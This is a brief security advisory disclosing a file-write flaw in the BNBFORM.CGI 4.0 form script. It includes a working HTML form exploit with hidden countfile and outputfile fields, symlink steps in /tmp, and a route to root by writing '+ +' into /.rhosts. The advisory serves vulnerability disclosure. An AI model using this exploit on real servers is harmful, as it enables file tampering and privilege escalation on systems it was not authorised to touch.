SUID Advisory #4 - BNBFORM.CGI. Any local user can create / append to / truncate any file owned by the web server user (nobody/apache/whatever).
c9aa67b4cd9ecd4e946053852b20e67d6099e04bc39c55ffe31b694f332a9f8e
suid@suid.kg - mini advisory - BNBFORM.CGI
Software: BNBFORM.CGI
Vendor: BigNoseBird.com
URL: http://bignosebird.com/carchive/bnbform.shtml
Version: Version 4.0
Platforms: Unix, Windows NT
Type: Input validation problem
Summary:
Any local user can create / append to / truncate any file owned
by the web server user (nobody/apache/whatever).
Vulnerability:
Building a HTML form resembling:
<form method=post action=/cgi-bin/bnbform.cgi>
<input type=hidden name=blah value=blah>
<input type=hidden name=required value=blah>
<input type=hidden name=data_order value=blah>
<!-- To truncate a file -->
<input type=hidden name=countfile value="/tmp/whatever">
<!-- To append to a file -->
<input type=hidden name=outputfile value="/tmp/whatever">
<input type=submit>
</form>
In the /tmp directory as a local user, create a symbolic link to
either /tmp/whatever.bcnt for the countfile/truncate version, or
/tmp/whatever.bout for the outputfile/append version.
If httpd is running with UID == 0, you could potentially get root
if the system honours /.rhosts by setting the value of blah to
"+ +\n". Then symlink'ing /tmp/whatever.bout -> /.rhosts Example:
<input type=hidden name=blah value="+ +
">
Of course you could simply send this in a POST request directly
to the web server. Whatever.
Ok. Have a good one.
http://www.suid.edu/advisories/004.txt
EOF